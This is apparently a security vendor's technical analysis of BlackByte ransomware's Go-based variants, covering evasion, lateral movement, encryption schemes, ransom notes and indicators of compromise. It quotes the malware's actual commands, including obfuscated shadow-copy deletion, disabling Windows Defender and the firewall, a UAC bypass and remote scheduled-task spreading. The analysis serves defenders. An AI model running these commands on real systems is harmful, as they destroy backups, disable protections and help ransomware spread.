Analysis of BlackByte Ransomware's Go-Based Variants

Key Points

BlackByte is a full-featured ransomware family that first emerged around July 2021
The ransomware was originally written in C# and later redeveloped in the Go programming language around September 2021
The threat group exfiltrates data prior to deploying ransomware and leaks the stolen information if a ransom is not paid
The group has demanded multi-million dollar ransoms from some victims
BlackByte ransomware employs various anti-analysis techniques including a multitude of dynamic string obfuscation algorithms
In early versions of the ransomware, file encryption utilized a hardcoded 1,024-bit RSA public key along with a 128-bit AES key that was derived from a file retrieved from a command and control server
More recent BlackByte versions use Curve25519 Elliptic Curve Cryptography (ECC) for asymmetric encryption and ChaCha20 for symmetric file encryption

Introduction

BlackByte is a Ransomware-as-a-Service (RaaS) group that has been targeting corporations worldwide since July 2021. Previous versions of the ransomware were written in C#. More recently, the authors redeveloped the ransomware using the Go programming language. The BlackByte Go variant was used in attacks described in an FBI advisory that warned BlackByte had compromised numerous businesses, including entities in US critical infrastructure sectors. In this post, Zscaler ThreatLabz analyzes two variants of the Go-based implementation of BlackByte ransomware.

Technical Analysis

Variants

ThreatLabz has identified two variants of the Go-based variant of BlackByte. The first variant was seen in-the-wild around September 2021 and shares many similarities with the C# version including the commands executed to perform lateral propagation, privilege escalation, and file encryption algorithms. A more recent Go-based variant was introduced around February 2022. This new variant introduced many additional features and updated the file encryption algorithms. In this blog, for brevity, the Go-based BlackByte variant 1 will be referred to as BlackByte v1 and the second variant will be referred to as BlackByte v2.

Initialization

Before BlackByte performs file encryption, the ransomware first performs initialization. Most of these initialization functions are very similar or identical to the C# variant of BlackByte.

Mutex Creation

BlackByte creates a mutex using a value that is hardcoded in the malware, for example: Global\7b55551e-a59c-4252-a34a-5c80372b3014. If the mutex exists, BlackByte will terminate. This ensures that there is only one active instance of BlackByte running at a time.

Identify System Language

BlackByte ransomware resolves the victim’s system language by comparing the language ID values with those shown in Table 1. If the system language matches any from this list, BlackByte will exit without performing file encryption.

		Language ID
		
		
		Language
		
	
	
		
		1049
		
		
		Russian
		
	
	
		
		1058
		
		
		Ukrainian
		
	
	
		
		1059
		
		
		Belarusian
		
	
	
		
		1064
		
		
		Tajik
		
	
	
		
		1067
		
		
		Armenian
		
	
	
		
		1068
		
		
		Azerbaijani Latin
		
	
	
		
		1079
		
		
		Georgian
		
	
	
		
		1087
		
		
		Kazakh
		
	
	
		
		1090
		
		
		Turkmen
		
	
	
		
		1091
		
		
		Uzbek Latin
		
	
	
		
		2092
		
		
		Azerbaijani Cyrillic
		
	
	
		
		2115
		
		
		Uzbek Cyrillic

Table 1. System languages avoided by BlackByte ransomware

These languages are specifically avoided by BlackByte to prevent encrypting files on systems that are located in Commonwealth of Independent States (CIS) countries. This likely indicates that the threat actors behind BlackByte are located in Eastern Europe and/or Russia. This is designed to reduce the threat that local law enforcement in those regions will pursue criminal prosecution against those responsible for BlackByte.

Enable Long Paths

The malware executes the following command to avoid issues that may occur when encrypting files with long path names:

C:\WINDOWS\system32\cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v LongPathsEnabled /t REG_DWORD /d 1 /f

Disable Controlled Folder Access

BlackByte executes the following command to disable controlled folder access:

Set-MpPreference -EnableControlledFolderAccess Disabled

The Windows controlled folder access feature is designed to protect data from malicious applications such as ransomware. When enabled, files located in the specified protected folders can not be modified by unauthorized applications.

Delete Shadow Copies

Similar to other ransomware families, BlackByte deletes shadow copies to prevent a victim from easily recovering files from backups. There are two methods that BlackByte uses to delete shadow copies. The first executes the following PowerShell command:

$x = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String(‘RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAg’+
‘AFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8AC’+‘AARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkA’+
‘F8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==’));Invoke-Expression $x

The Base64 encoding string when decoded is the following: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}

BlackByte also executes the commands to delete shadow copies for each drive:

C:\WINDOWS\system32\cmd.exe /c vssadmin resize shadowstorage /for=<unit>: /on=<unit>: /maxsize=401MB
C:\WINDOWS\system32\cmd.exe /c vssadmin resize shadowstorage /for=<unit>: /on=<unit>: /maxsize=unbounded

Process Termination and Stop / Start Services

The following commands are executed by BlackByte to stop services that may hinder file encryption:

C:\WINDOWS\system32\sc.exe config SQLTELEMETRY start= disabled
C:\WINDOWS\system32\sc.exe config SQLTELEMETRY$ECWDB2 start= disabled
C:\WINDOWS\system32\sc.exe config SQLWriter start= disabled
C:\WINDOWS\system32\sc.exe config SstpSvc start= disabled
C:\WINDOWS\system32\sc.exe config MBAMService start= disabled
C:\WINDOWS\system32\sc.exe config wuauserv start= disabled

BlackByte will also start the following services:

C:\WINDOWS\system32\sc.exe config Dnscache start= auto
C:\WINDOWS\system32\sc.exe config fdPHost start= auto
C:\WINDOWS\system32\sc.exe config FDResPub start= auto
C:\WINDOWS\system32\sc.exe config SSDPSRV start= auto
C:\WINDOWS\system32\sc.exe config upnphost start= auto
C:\WINDOWS\system32\sc.exe config RemoteRegistry start= auto

BlackByte ransomware terminates the following processes shown in Table 2 at the beginning of the execution:

		uranium
		processhacker
		procmon
		pestudio
		procmon64
	
	
		x32dbg
		x64dbg
		cffexplorer
		procexp64
		procexp
	
	
		pslist
		tcpview
		tcpvcon
		dbgview
		rammap
	
	
		rammap64
		vmmap
		ollydbg
		autoruns
		autorunsc
	
	
		regmon
		idaq
		idaq64
		immunitydebugger
		wireshark
	
	
		dumpcap
		hookexplorer
		importrec
		petools
		lordpe
	
	
		sysinspector
		proc_analyzer
		sysanalyzer
		sniff_hit
		windbg
	
	
		joeboxcontrol
		joeboxserver
		joeboxserver
		resourcehacker
		fiddler
	
	
		httpdebugger
		dumpit
		rammap
		rammap64
		vmmap
	
	
		agntsvc
		cntaosmgr
		dbeng50
		dbsnmp
		encsvc
	
	
		excel
		firefox
		firefoxconfig
		infopath
		isqlplussvc
	
	
		mbamtray
		msaccess
		msftesql
		mspub
		mydesktopqos
	
	
		mydesktopservice
		mysqld
		mysqld-nt
		mysqld-opt
		Ntrtscan
	
	
		ocautoupds
		ocomm
		ocssd
		onenote
		oracle
	
	
		outlook
		PccNTMon
		powerpnt
		sqbcoreservice
		sql
	
	
		sqlagent
		sqlbrowser
		sqlservr
		sqlwriter
		steam
	
	
		synctime
		tbirdconfig
		thebat
		thebat64
		thunderbird
	
	
		tmlisten
		visio
		winword
		wordpad
		xfssvccon
	
	
		zoolz
		veeam
		backup
		sql
		memtas
	
	
		vss
		sophos
		svc$
		mepocs
		wuauserv
	
	
		filemon

Table 2. Process names terminated by BlackByte ransomware

Many of these process names are related to business applications. BlackByte kills these processes to avoid open file handle permission issues when performing file encryption of the victim’s files. In addition, the list contains a large number of malware analyst tools that can be used to reverse engineer the functionality of the ransomware.

BlackByte also terminates the following services that are associated with antivirus products, backup software, and business applications including financial software, email clients, and databases as shown below in Table 3.

		klvssbridge64
		vapiendpoint
		ShMonitor
		Smcinst
		SmcService
	
	
		SntpService
		svcGenericHost
		swi_
		TmCCSF
		tmlisten
	
	
		TrueKey
		TrueKeyScheduler
		TrueKeyServiceHelper
		WRSVC
		McTaskManager
	
	
		OracleClientCache80
		mfefire
		wbengine
		mfemms
		RESvc
	
	
		mfevtp
		sacsvr
		SAVAdminService
		SAVService
		
		SepMasterService
		
	
	
		PDVFSService
		ESHASRV
		SDRSVC
		FA_Scheduler
		KAVFS
	
	
		KAVFSGT
		kavfsslp
		klnagent
		macmnsvc
		masvc
	
	
		MBAMService
		MBEndpointAgent
		McShield
		audioendpointbuilder
		Antivirus
	
	
		AVP
		DCAgent
		bedbg
		EhttpSrv
		MMS
	
	
		ekrn
		EPSecurityService
		EPUpdateService
		ntrtscan
		EsgShKernel
	
	
		msexchangeadtopology
		AcrSch2Svc
		MSOLAP$TPSAMA
		Intel(R) PROSet Monitoring
		
		msexchangeimap4
		
	
	
		ARSM
		unistoresvc_1af40a
		ReportServer$TPS
		MSOLAP$SYSTEM_BGC
		W3Svc
	
	
		MSExchangeSRS
		ReportServer$TPSAMA
		Zoolz 2 Service
		MSOLAP$TPS
		
		aphidmonitorservice
		
	
	
		SstpSvc
		MSExchangeMTA
		ReportServer$SYSTEM_BGC
		Symantec System Recovery
		UI0Detect
	
	
		MSExchangeSA
		MSExchangeIS
		ReportServer
		MsDtsServer110
		POP3Svc
	
	
		MSExchangeMGMT
		SMTPSvc
		MsDtsServer
		IisAdmin
		MSExchangeES
	
	
		EraserSvc11710
		Enterprise Client Service
		MsDtsServer100
		NetMsmqActivator
		stc_raw_agent
	
	
		VSNAPVSS
		PDVFSService
		AcrSch2Svc
		Acronis
		
		CASAD2DWebSvc
		
	
	
		CAARCUpdateSvc
		McAfee
		avpsus
		DLPAgentService
		mfewc
	
	
		BMR Boot Service
		DefWatch
		ccEvtMgr
		ccSetMgr
		SavRoam
	
	
		RTVscan
		QBFCService
		QBIDPService
		Intuit.QuickBooks.FCS
		
		QBCFMonitorService
		
	
	
		YooIT
		zhudongfangyu

Table 3. Service names terminated by BlackByte ransomware

Windows Firewall

BlackByte disables the Windows firewall via the command:

netsh advfirewall set allprofiles state off

Windows Defender

The ransomware executes the following command to delete task manager, resource monitor, and stop the Windows Defender service:

cmd /c del C:\Windows\System32\Taskmgr.exe /f /q & del C:\Windows\System32\resmon.exe /f /q &
powershell -command "$x = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String
(‘V’+‘wBp’+‘A’+‘G4AR’+‘AB’+‘lAG’+‘YAZQBuAGQA’));Stop-Service -Name $x;Set-Service -StartupType Disabled

The Base64 encoded string above decodes to WinDefend.

Raccine Anti-Ransomware

BlackByte terminates and uninstalls an anti-ransomware product known as Raccine. The Raccine processes that are terminated are raccine.exe and raccinesettings.exe. To uninstall Raccine, BlackByte deletes the following registry keys and values:

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Raccine Tray
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\Raccine
HKEY_CURRENT_USER\SOFTWARE\Raccine
HKEY_LOCAL_MACHINE\SOFTWARE\Raccine

BlackByte then deletes Raccine’s scheduled task via the command:

C:\WINDOWS\system32\schtasks.exe /DELETE /TN ““Raccine Rules Updater”” /F

Privilege Escalation

The ransomware executes the following commands to disable UAC remote restrictions:

C:\WINDOWS\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

BlackByte sets the EnableLinkedConnections registry value to force symbolic links to be written to link logon sessions as follows:

C:\WINDOWS\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f

In BlackByte v2, an additional privilege escalation method was added that exploits the CMSTPLUA COM interface to bypass UAC. The ShellExec method of the interface ICMLuaUtil can be invoked with arbitrary commands with elevated privileges using the ElevationMoniker Elevation:Administrator!new:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}. This allows BlackByte v2 to execute the svchost.exe process that it injects into with elevated privileges. This privilege escalation technique has also been utilized by other ransomware groups including REvil and LockBit.

Lateral Propagation

BlackByte ransomware performs network enumeration and can propagate across a local network. First it executes the following commands to enable network discovery and file and printer sharing:

C:\WINDOWS\system32\cmd.exe /c netsh advfirewall firewall set rule “group=“Network Discovery”” new enable=Yes
C:\WINDOWS\system32\cmd.exe /c netsh advfirewall firewall set rule “group=“File and Printer Sharing”” new enable=Yes

The following commands are then executed to discover other computers and network file shares:

net view
arp -a

BlackByte loads the Active Directory module RSAT-AD-PowerShell and queries for other computers via the following commands:

C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe Install-WindowsFeature -Name “RSAT-AD-PowerShell” –IncludeAllSubFeature

powershell -command “Import-Module ActiveDirectory;Get-ADComputer -Filter * -Properties * | FT Name”

If the -a flag is passed via the command-line, BlackByte attempts to copy itself to remote computer’s public folders via the administrative share \<remote_computer_name>\c$\Users\Public&lt;filename.exe>. If that attempt is unsuccessful, BlackByte will default to the path: \<remote_computer_name>\Users\Public&lt;filename.exe>. BlackByte uses the Windows task scheduler to execute the ransomware on the remote host using the following command:

C:\Windows\system32\schtasks.exe /Create /S <remote_computername> /TN <taskname> /TR “C:\Users\Public&lt;filename> -s <passphrase>” /ru SYSTEM /sc onlogon /RL HIGHEST /f

In BlackByte v2, the filename and task name are pseudorandomly generated using a function that produces eight upper and lowercase alphabetic and numeric characters (e.g., BqgDOVYL.exe and KYL8EpE9, respectively). BlackByte v1 uses a hardcoded filename and command-line argument complex.exe -single and the hardcoded task name asd.

After scheduling the task, the remote BlackByte binary is executed using the command:

C:\Windows\system32\schtasks.exe /S <remote_computername> /Run /TN <taskname>

After the task is executed, BlackByte deletes the remote task using the command:

C:\Windows\system32\schtasks.exe /Delete /S <remote_computername> /TN <taskname> /f

BlackByte then deletes the copy of itself on the remote host network share. BlackByte also attempts to access administrative shares A$ through Z$ and the folders shown in Table 4.

		Users
		Backup
		Veeam
		Consejo
		homes
	
	
		home
		media
		common
		Storage Server
		Public
	
	
		Web
		Images
		Downloads
		BackupData
		
		ActiveBackupForBusiness
		
	
	
		Backups
		NAS-DC
		DCBACKUP
		DirectorFiles
		share

Table 4. Network shares targeted by BlackByte ransomware

Check for Analysis Tools

The malware checks the following DLL modules in memory shown in Table 5 and exits if they are present:

		DLL Filename
		Description
	


	
		DBGHELP.DLL
		Windows DbgHelp Library
	
	
		SbieDll.dll
		Sandboxie
	
	
		SxIn.dll
		Qihu 360 Total Security
	
	
		Sf2.dll
		Avast Antivirus
	
	
		snxhk.dll
		Avast Antivirus
	
	
		cmdvrt32.dll
		COMODO Internet Security

Table 5. DLLs Identified by BlackByte ransomware

Disable Debugging

BlackByte attempts to prevent debugging tools from monitoring and attaching to various processes by removing the following registry values under SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options:

vssadmin.exe
wbadmin.exe
bcdedit.exe
powershell.exe
diskshadow.exe
net.exe
taskkill.exe
wmic.exe
fsutil.exe

Process Injection

BlackByte v1 injects the ransomware code in an instance of regedit.exe, while BlackByte v2 injects itself into an instance of svchost.exe. After the process is injected with the ransomware code, the file encryption is then performed in the context of the regedit.exe or svchost.exe process. BlackByte then deletes its original binary on disk by executing the command:

C:\Windows\system32\cmd.exe /c ping 1.1.1.1 -n 10 > Nul & Del <blackbyte_filepath.exe> /F /Q

The ping command is used to delay the file deletion by 10 seconds. The process injection functionality may be able to bypass some security software detections.

Unmount Virtual Machine Images

In order to identify virtual machines on the victim’s system, BlackByte will execute the command:

powershell Get-VM

If any virtual machine files are located, BlackByte will attempt to unmount the image by executing the following command line:

powershell.exe Dismount-DiskImage -ImagePath <filename.vhd>

Backup Volumes

The malware executes mountvol.exe to try to mount additional volumes:

C:\WINDOWS\system32\mountvol.exe A: \?\Volume{[GUID]}
C:\WINDOWS\system32\mountvol.exe B: \?\Volume{[GUID]}
C:\WINDOWS\system32\mountvol.exe E: \?\Volume{[GUID]}
C:\WINDOWS\system32\mountvol.exe F: \?\Volume{[GUID]}\

This is likely an attempt to mount and encrypt backup volumes to further prevent file recovery after encryption.

File Encryption

BlackByte enumerates all physical drives and network shares skipping files that contain the following substrings in Table 6:

		blackbyte
		ntdetect.com
		bootnxt
		ntldr
		recycle.bin
	
	
		bootmgr
		thumbs.db
		ntuser.dat
		bootsect.bak
		autoexec.bat
	
	
		iconcache.db
		bootfont.bin

Table 6. BlackByte ransomware file substring filter list

BlackByte avoids the following extensions shown in Table 7.

		url
		msilog
		log
		ldf
		lock
	
	
		theme
		msi
		sys
		wpx
		cpl
	
	
		adv
		msc
		scr
		key
		ico
	
	
		dll
		hta
		deskthemepack
		nomedia
		msu
	
	
		rtp
		msp
		idx
		ani
		386
	
	
		diagcfg
		bin
		mod
		ics
		com
	
	
		hlp
		spl
		nls
		cab
		exe
	
	
		diagpkg
		icl
		ocx
		rom
		prf
	
	
		themepack
		msstyles
		icns
		mpa
		drv
	
	
		cur
		diagcab
		cmd
		shs

Table 7. File extensions skipped by BlackByte ransomware

BlackByte will also skip files located in the following directories shown in Table 8.

		bitdefender
		trend micro
		avast software
		intel
		common files
	
	
		programdata
		windowsapps
		appdata
		mozilla
		application data
	
	
		google
		windows.old
		system volume information
		program files (x86)
		boot
	
	
		tor browser
		windows
		intel
		perflogs
		msocache

Table 8. Directories whitelisted by BlackByte ransomware

BlackByte optimizes encryption speed based on the targeted file size according to the following rules:

		Filesize
		Encryption Algorithm
	


	
		Size &lt;= 5MB
		Encrypt the entire file
	
	
		15MB &gt;= Size &gt; 5MB
		Encrypt the first 1MB and last 1MB
	
	
		150MB &gt;= Size &gt; 15MB
		Encrypt the first 5MB and last 5MB
	
	
		Size &gt; 150MB
		Encrypt the first 50MB and last 50MB

BlackByte renames encrypted files with the extension .blackbyte. The ransomware creates a DefaultIcon registry key under HKEY_CLASSES_ROOT.blackbyte that points to an icon file, so that every file that is encrypted will show this icon in Windows explorer. In addition, the registry names s1159 and s2359 are set to BLACKBYTE under HKEY_CURRENT_USER\Control Panel\International. These registry values control the time format for AM/PM. As a result, Windows will show BLACKBYTE instead of AM/PM as shown below in Figure 2.

Figure 2. BlackByte AM/PM time format modification

This time format modification is performed by executing the commands:

reg add “HKCU\Control Panel\International” /v s1159 /t REG_SZ /d BLACKBYTE /f
reg add “HKCU\Control Panel\International” /v s2359 /t REG_SZ /d BLACKBYTE /f

File Encryption Algorithms (Variant 1)

BlackByte v1 must be executed with the command line argument -single followed by a SHA256 hash. This hash is combined with a TOR onion URL (e.g., hxxp://7oukjxwkbnwyg7cekudzp66okrchbuubde2j3h6fkpis6izywoj2eqad[.]onion/). The SHA256 hash given as an argument is concatenated to the onion URL to build the URL of the victim ransom portal that is embedded in the ransom note. This URL is substituted in the [LINK] field of the ransom note template.

When BlackByte v1 is executed, the malware tries to connect to a hardcoded URL that hosts a file that is involved in the construction of an AES key that is used to encrypt a victim’s files. An example URL used for this purpose was hxxps://185.93.6[.]31/mountain.png. The mechanism used to build the AES key is very similar to the C# variant.

After the content of the file mountain.png is downloaded, BlackByte reads the first 16 bytes of the file into a buffer and 24 bytes at the offset 0x410 of the file into another buffer. These 24 bytes are used as key to create and initialize a NewTripleDESCipher object from the Go Cryptographic API. This object is used to decrypt the first 16 bytes of the file mountain.png. The resulting 16-byte buffer will be used as a PBKDF2 password to derive the AES key that will be used to encrypt the victim’s files. The BlackByte PBKDF2 algorithm uses SHA1 as the hashing function and 1,000 iterations to derive the AES key. The password is converted to unicode and the unicode string BLACKBYTE_IS_COOL is used as the salt. The following example Python code can be used to derive the AES key used for file encryption.

Figure 3. Python code to decrypt BlackByte v1 files with the file (e.g., mountain.png) downloaded from the C2 server

Victim’s files are encrypted with AES using CBC mode. The first 16 bytes of the PBKDF2 derived key are used as AES key, and the same 16 bytes are used as the initialization vector (IV). The same AES key is used to encrypt all the files on a victim’s machine.

The PBKDF2 password is encrypted with a hardcoded 1,024-bit RSA public key and the resulting RSA-encrypted value is encoded with Base64. This Base64 encoded string is substituted in the [KEY] field in the ransom note template. The threat actor can decrypt the PBKDF2 password with their corresponding RSA private key, derive the AES key, and thereafter, decrypt the victim’s encrypted files. The following is an example RSA public key that was hardcoded in BlackByte:

-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDUBwECQuQiVGorPYvHrJM11OWV
E1PS8gaBqIAfPaR1rQHUEXu3iX/da/dCtV8Z27/SIA/ZYUNhTyUsX9Snjz8zve90
QAiG1c/BS81WWRax7M7i1rESStVwOaUDAj5w6cz9GwDMGYI+wve9Qyjtw5R6hr5I
qlIEig1Wy1X27vUC2wIDAQAB
-----END PUBLIC KEY-----

Ransom Note and BlackByte Icon (Variant 1)

The BlackByte ransom note and an image containing an icon file are stored as Base64 encoded strings in the binary. After the encryption of the victim’s files, the ransom note is written to a file named BlackByteRestore.txt, and the previously mentioned icon file is written to a file named BB.ico. An example BlackByte v1 ransom note template is shown below in Figure 4. The BlackByte logo uses the extended ASCII characters of the 8-bit code page 437 to create 3-D block letters.

Figure 4. Go-based BlackByte v1 ransom note template

File Encryption Algorithms (Variant 2)

The second variant of BlackByte ransomware does not require a network connection to start encryption. In addition, the ransomware’s command-line parameters were modified. BlackByte v2 requires two command line parameters:

sample.exe <flags> <passphrase>

The first parameter is a flag (e.g., -a) that controls specific behaviors of the ransomware (e.g., to propagate across a network), while the second parameter is a passphrase (e.g., 54726956) that is verified before file encryption commences. If BlackByte is not provided with any command-line arguments, the ransomware prints out the phrase BlackByte ransomware, 8-th generation, the most destructive of all ransomware products, real natural disaster. and exits.

BlackByte v2 removed the RSA and AES file encryption algorithms from the ransomware. The encryption algorithms were replaced with Curve25519 elliptic curve cryptography for asymmetric encryption and ChaCha for symmetric algorithm. The Curve25519 functions are statically compiled within BlackByte using Go library code. BlackByte generates a random 32-byte buffer per file using the Windows API function RtlGenRandom(). This random value is used as a file’s secret key. The file’s public key is calculated as follows:

file_public_key = Curve25519(file_secret_key, base_point = 0x9)

The threat actor’s Curve25519 public key is hardcoded in the binary and stored as a Base64 encoded string. For the sample with the SHA256 hash ffc4d94a26ea7bcf48baffd96d33d3c3d53df1bb2c59567f6d04e02e7e2e5aaa, the hardcoded Curve25519 public key was the string:

2BSTzcpdqRW/a2DRT3TiL9lN5INRmmn1lCQWzZhkfQs= (d81493cdca5da915bf6b60d14f74e22fd94de483519a69f5942416cd98647d0b)

The shared secret is derived as follows:

shared_secret = Curve25519(file_secret_key, blackbyte_public_key)

The shared secret is hashed with SHA256 to derive a 32-byte ChaCha encryption key. The ChaCha encryption key is then hashed again with SHA256 to derive the ChaCha nonce (using 12 bytes starting at offset 10). Once the ChaCha key parameters have been derived, they will be used to encrypt the file’s content. The encrypted data is written to the file (overwriting the original content). Finally, the victim’s 32-byte public key is concatenated to the encrypted content of the file. The BlackByte v2 encryption algorithm is shown below in Figure 5.

Figure 5. BlackByte v2 file encryption algorithm

The threat actor can use the file’s public key together with the threat actor’s secret key to recover the shared secret and use it to decrypt the encrypted data as follows:

shared_secret = Curve25519(blackbyte_secret_key, file_public_key)

The following Python code in Figure 6 can be used to decrypt BlackByte encrypted data from a file that has been encrypted if the threat actor’s private key is obtained:

Figure 6. Python code to decrypt BlackByte v2 files with the threat actor’s private key

BlackByte v2 also encrypts the filename after encryption. The encryption is a simple XOR layer with a hardcoded key, followed by Base64 encoding as shown in Figure 7.

Figure 7. BlackByte v2 filename encryption

In the analyzed sample, the XOR key was fuckyou123. After a filename has been encrypted, the file is renamed and the .blackbyte extension is concatenated.

Ransom Note and BlackByte Icon (Variant 2)

BlackByte v2 introduced some improvements to storing the ransom note and icon file. The Base64 encoded blocks for the ransom note and icon file added an XOR-based encryption layer. The XOR key to decrypt the ransom note and icon file is embedded in the ransomware as an obfuscated string. The icon file is written to the victim’s %APPDATA% directory using a randomly generated filename consisting of six upper and lowercase alphabetic and numeric characters (e.g., i2uOJh.ico).

BlackByte v2 contains a hardcoded TOR onion URL and path for the victim portal rather than relying on the command-line for the path value. BlackByte v2 also added a hardcoded password that is required to access the victim ransom portal. An example password is:

gkaW_#DD[Aw_JTB@luXpJBdye6eLr@{bx5pHFA)T5FpMYJC]f|@

The BlackByte v2 ransom note template is shown below in Figure 8. The [LINK] substring in the ransom note is replaced with the hardcoded BlackByte victim URL and the [PASSW] substring is replaced with the victim-specific password for the ransom portal.

Figure 8. BlackByte v2 ransom note template

An example ransom note when populated after file encryption has been performed for BlackByte v2 is shown in Figure 9.

Figure 9. BlackByte v2 ransom note

After BlackByte encrypts files, the ransom note is written to each directory, the encrypted files are renamed, and their icons are replaced by the BlackByte icon.

Ransom Portal and Leak Site

When a victim accesses the link in the ransom portal, they are instructed to enter the access key from the ransom note as shown in Figure 10.

Figure 10. BlackByte victim ransom portal

After a victim authenticates, they are provided the ransom demand and instructions how to purchase Bitcoin. There is also a live chat feature as shown in Figure 11.

Figure 11. BlackByte ransom negotiation portal

Victims are further pressured to pay the ransom, or risk having their data publicly leaked on their TOR hidden service as shown in Figure 12.

Figure 12. BlackByte victim leak site

Print Bombing

In addition to dropping a ransom note on the victim’s machine, the ransomware sends a message to be printed by any connected printers. The printed ransom message is an RTF file with the content shown below:

{\rtf1\ansi\ansicpg1251\deff0\nouicompat\deflang1049{\fonttbl{\f0\fnil\fcharset0 Calibri;}}
{*\generator Riched20 10.0.19041}\viewkind4\uc1
\pard\sa200\sl276\slmult1\qc\f0\fs56\lang9 Your HACKED by BlackByte team.\par
Connect us to restore your system.\fs22\par
\fs56 Your HACKED by BlackByte team.\par
Connect us to restore your system.\fs22\par
\fs56 Your HACKED by BlackByte team.\par
Connect us to restore your system.\fs22\par
\fs56 Your HACKED by BlackByte team.\par
Connect us to restore your system.\fs22\par
\fs56 Your HACKED by BlackByte team.\par
Connect us to restore your system.\fs22\par
\fs56 Your HACKED by BlackByte team.\par
Connect us to restore your system.\fs22\par

\pard\sa200\sl276\slmult1\par
}

In BlackByte v1, the message is written to the file C:\Users\tree.dll and the following command is executed to print it:

C:\Windows\System32\cmd.exe /c for /l %x in (1,1 ,75) do start wordpad.exe /p C:\Users\tree.dll

In addition, a task named Task is created to print the message every hour:

C:\WINDOWS\system32\schtasks.exe /create /np /sc HOURLY /tn Task /tr “C:\Windows\System32\cmd.exe
/c for /l %x in (1,1,75) do start wordpad.exe /p C:\Users\tree.dll” /st 07:00

In BlackByte v2, the text of the message is written to a file with a random name consisting of six upper and lowercase alphabetic and numeric characters. The task name is also created randomly consisting of eight upper and lowercase alphabetic and numeric characters. An example task command to print the ransom message is shown below:

C:\WINDOWS\system32\schtasks.exe /create /np /sc HOURLY /tn 4y77VPNo /tr “C:\Windows\System32\cmd.exe
/c for /l %x in (1,1,75) do start %SystemDrive%\Program Files\Windows NT\Accessories\WordPad.exe /p
C:\Users\1HoWkK.dll” /st 07:00

Anti-Analysis / Anti-Forensics Techniques

String Obfuscation

Both Go-based BlackByte variants encrypt most strings using a tool similar to AdvObfuscator. Each string is decrypted using a unique algorithm with polymorphic code that implements different operations xor, addition, subtraction, etc. In the examples below, the encrypted strings in Figure 13 are built and decrypted from arguments on the stack.

Figure 13. BlackByte string obfuscation examples

Modified UPX Packer

In addition to string obfuscation, BlackByte samples are typically packed with UPX. In BlackByte v1, all of the samples observed by ThreatLabz were packed with the standard UPX packer and could be unpacked via the command-line parameter -d. The early samples of BlackByte v2 were also packed with the standard UPX packer. However, the most recent BlackByte samples (since March 2022) are packed with a modified version of UPX. The names of the sections have been renamed from UPX0 and UPX1 to BB0 and BB1, respectively. Figure 14 shows an example BlackByte v2 sample with the modified UPX headers.

Figure 14. BlackByte v2 altered UPX header

Antivirus Detection

Due to BlackByte’s anti-analysis features, polymorphic code, and heavy obfuscation many antivirus products have very low detection rates. For example, the BlackByte sample with the SHA256 534f5fbb7669803812781e43c30083e9197d03f97f0d860ae7d9a59c0484ace4 has an antivirus detection rate of 4/61 at the time of publication.

Conclusion

BlackByte is a full-featured ransomware family operated by a threat group that continues to breach organizations and demand large ransom amounts. The threat group also performs double extortion attacks by stealing an organization’s files and leaking them online if the ransom is not paid. The ransomware code itself is regularly updated to fix bugs, bypass security software, and hinder malware analysis. The encryption algorithms have also been improved to be more secure and prevent file recovery. This demonstrates that the threat group will likely continue to improve the ransomware and remain a significant threat to organizations.

Cloud Sandbox Detection

Zscaler’s multilayered cloud security platform detects indicators at various levels, as shown below:

Win64.Ransom.Blackbyte

Indicators of Compromise

		IoC Type
		 Value 
	
	
		BlackByte v1 Packed Sample 
		1df11bc19aa52b623bdf15380e3fded56d8eb6fb7b53a2240779864b1a6474ad
	
	
		BlackByte v1 Packed Sample
		388163c9ec1458c779849db891e17efb16a941ca598c4c3ac3a50a77086beb69
	
	
		BlackByte v1 Unpacked Sample
		44a5e78fce5455579123af23665262b10165ac710a9f7538b764af76d7771550
	
	
		BlackByte v1 Unpacked Sample
		6f36a4a1364cfb063a0463d9e1287248700ccf1e0d8e280e034b02cf3db3c442
	
	
		BlackByte v2 Packed Sample
		ffc4d94a26ea7bcf48baffd96d33d3c3d53df1bb2c59567f6d04e02e7e2e5aaa
	
	
		BlackByte v2 Packed Sample
		9103194d32a15ea9e8ede1c81960a5ba5d21213de55df52a6dac409f2e58bcfe
	
	
		BlackByte v2 Packed Sample
		e434ec347a8ea1f0712561bccf0153468a943e16d2cd792fbc72720bd0a8002e
	
	
		BlackByte v1 Onion URL
		hxxp://7oukjxwkbnwyg7cekudzp66okrchbuubde2j3h6fkpis6izywoj2eqad.]onion
	
	
		BlackByte v2 Onion URL
		hxxp://fyk4jl7jk6viteakzzrxntgzecnz4v6wxaefmbmtmcnscsl3tnwix6yd.]onion
	
	
		BlackByte v2 Onion URL
		hxxp://p5quu5ujzzswxv4nxyuhgg3fjj2vy2a3zmtcowalkip2temdfadanlyd.]onion
	
	
		BlackByte v1 AES Key Seed URL 
		hxxps://185.93.6[.]31/mountain.png

References

https://redcanary.com/blog/blackbyte-ransomware/
https://www.ic3.gov/Media/News/2022/220211.pdf
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/blackbyte-ransomware-pt-1-in-depth-analysis/
https://www.bleepingcomputer.com/forums/t/755181/blackbyte-ransomware-blackbyte-support-topic/

Article Link: https://www.zscaler.com/blogs/security-research/analysis-blackbyte-ransomwares-go-based-variants